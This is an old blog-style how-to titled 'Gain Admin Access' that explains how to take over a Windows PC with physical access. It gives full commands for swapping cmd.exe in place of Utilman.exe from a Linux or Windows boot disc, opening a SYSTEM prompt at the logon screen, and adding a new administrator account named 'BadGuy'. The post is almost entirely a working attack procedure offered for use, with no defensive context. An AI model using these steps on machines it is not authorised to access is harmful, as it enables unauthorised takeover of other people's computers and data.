All you never wanted to know

View on GitHub
:new: 2010-01-28 :wavy_dash: :up: 2010-01-28

Gain Admin Access

To get access to a Windows PC as an Administrator user, there is a very brute security hole which you can use. The only thing is: You need physical access to the machine.

The procedure is as follows:

  1. use a Linux Boot-CD (e.g. BackTrack 4 or the System Rescue CD) or a Windows Installation disc (of the same version as installed!)
    • Linux Boot-CD: (there’s also a nice screencast over at
      1. if not already, mount the Windows partition
      2. go to Windows/system32/
      3. rename the file Utilman.exe to Utilman.exe.bak and copy cmd.exe to Utilman.exe:

         # mv Utilman.exe Utilman.exe.bak
         # cp cmd.exe Utilman.exe
      4. reboot the machine into Windows
    • Windows Boot-CD:
      1. select your Windows version to “repair”
      2. if it asks whether you want to do use System Rescue, say “No”
      3. after it has given up trying to repair your system, click the small link Advanced Recovery Options
      4. select Command Prompt
      5. now go to your Windows drive, for me it was D:
      6. do a cd \Windows\system32
      7. now rename the file Utilman.exe to Utilman.exe.bak and copy cmd.exe to Utilman.exe:

         D:\>ren Utilman.exe Utilman.exe.bak
         D:\>copy cmd.exe Utilman.exe
      8. reboot the machine into the regular Windows
  2. on the Logon screen of Windows, press Win+U - this would normally open the Utility Manager aka. Utilman.exe, but now, the Command Prompt should show up
  3. you have SYSTEM rights, so you can easily add a new Administrator user:

     C:\>net user BadGuy GoodPassword /add
     C:\>net localgroup Administrators BadGuy /add

    This will add the user BadGuy with the password GoodPassword and make him a member of the Administrators group.

  4. Login with the newly created user BadGuy
  5. Remember to delete the fake Utilman.exe and rename Utilman.exe.bak back to Utilman.exe